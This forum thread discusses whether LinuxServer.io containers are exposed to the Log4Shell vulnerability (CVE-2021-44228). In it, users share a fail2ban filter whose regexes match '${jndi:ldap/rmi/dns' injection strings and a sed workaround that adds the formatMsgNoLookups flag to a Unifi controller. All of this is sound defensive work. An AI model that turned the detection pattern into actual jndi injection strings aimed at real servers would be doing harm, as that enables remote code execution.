Hi,
does anyone know if Linuxserver.io Containers use log4j and might be affected by the circulating exploits?
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
I’m currently using SWAG and Nextcloud with NGINX, but I’ve disabled outside network access while clarifying this issue.
Thanks for any info!
Best regards
The containers that use java may be affected by this exploit. The only one to our knowledge is Unifi and we released a patch for that image last night.
1 Like
Ok, thanks for the info.
For anyone interested: I did some research, had a look at the nginx access log and came upon some calls. This was also helpful.
I created following jail for fail2ban to directly block these calls:
[Definition]
failregex=^<HOST> -.*"(GET|POST|HEAD).*HTTP.*"\$\{jndi:(ldap[s]?|rmi|dns)://?.*"$
^.*\$\{jndi:(ldap[s]?|rmi|dns)://?<ADDR>\:.*$
ignoreregex =
Might be useful for anyone using SWAG with Fail2Ban or just plain Fail2Ban
Is there any possibility to mitigate this attack on unifi-controller 6.0.45?
This is the last controller version that supports the AP’s I am running because Ubiquiti decided these are EOL and not supported any more in the newer controller versions.
It should be possible to modify the image and pass ‐Dlog4j2.formatMsgNoLookups=true as a parameter to the JVM?
Wow. That was extremely easy. I just created a shell script in /config/custom-cont-init.d/ which modifies the line using sed.
sed -i 's/-Xmx"${MEM_LIMIT}" -jar \/usr\/lib\/unifi\/lib\/ace.jar/-Xmx"${MEM_LIMIT}" -Dlog4j2.formatMsgNoLookups=true -jar \/usr\/lib\/unifi\/lib\/ace.jar/' /etc/services.d/unifi/run
Thank you.
All relevant info is here log4j Vulnerability | Info :: LinuxServer.io
No plans at this point to add modsecurity to the swag container. (Not that I think we can because I can’t seem to find an alpine package for it)
1 Like
Ubooquity’s developer states that it does not use log4j.